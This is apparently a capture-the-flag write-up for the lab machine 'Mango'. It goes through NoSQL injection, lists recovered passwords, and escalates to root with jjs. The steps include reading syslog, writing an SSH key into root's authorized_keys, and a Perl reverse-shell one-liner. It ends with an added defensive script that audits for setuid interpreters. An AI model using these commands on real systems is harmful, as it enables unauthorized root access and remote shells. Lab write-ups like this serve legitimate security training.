# Mango

IP: 10.10.10.162

The target is vulnerable to NoSQL injection.

Using a custom script, we obtain these credentials:

Username: admin
Password: t9KcS3>!0B#2

Username: mango
Password: h3mXK8RhU~f{]f5H

Logging in over SSH as admin doesn't work, but SSH with mango's username and password works.

Once in, running linpeas shows that `jjs` is exploitable, but we can't run it. Checking the permissions of the file reveals that only admin can run it.

Switching user to admin with admin's password works.

# Priv esc

File reads:

```
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/var/log/syslog"));
while ((line = br.readLine()) != null) { print(line); }' | jjs
```

File write:

Create a script:

```
perl -e 'use Socket;$i="10.10.14.21";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

```
ssh-keygen
```

Write the public key to the file `/root/.ssh/authorized_keys`:

```
echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw = new FileWriter("/root/.ssh/authorized_keys");
fw.write("ssh-rsa <PUBLIC_KEY>");
fw.close();' | jjs
```

Now SSH in with the private key:

```
ssh -i private_key root@10.10.10.162
```

And we get root.
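
A defender-side audit for the condition linpeas flagged above, as an added example that is not part of the original write-up: it lists script interpreters that carry a setuid or setgid bit. It assumes `jjs` had such a bit set (the write-up only says it was exploitable and restricted to admin), plus GNU `find` and `stat`; the function name and interpreter list are hypothetical.

```shell
#!/bin/sh
# Added example (not from the write-up): flag script interpreters that carry
# a setuid or setgid bit. Requires GNU find and GNU stat.
# The interpreter list is an assumption; extend it for your environment.
INTERPRETERS="jjs perl python python3 ruby php node lua gawk bash dash"

# audit_priv_interpreters DIR...
# Prints "MODE OWNER:GROUP PATH" per finding; returns 1 if anything was found.
audit_priv_interpreters() {
    # -perm /6000 matches files with the setuid bit, the setgid bit, or both.
    hits=$(find "$@" -xdev -type f -perm /6000 2>/dev/null |
        while IFS= read -r path; do
            name=$(basename "$path")
            for i in $INTERPRETERS; do
                if [ "$name" = "$i" ]; then
                    printf '%s %s\n' "$(stat -c '%A %U:%G' "$path")" "$path"
                fi
            done
        done)
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# Run as: sh audit.sh /usr /opt
if [ "$#" -gt 0 ]; then
    audit_priv_interpreters "$@"
fi
```

Any hit deserves review: an interpreter with these bits lets its permitted callers read and write files with the privileges of the file's owner or group, which is what the `jjs` snippets above rely on.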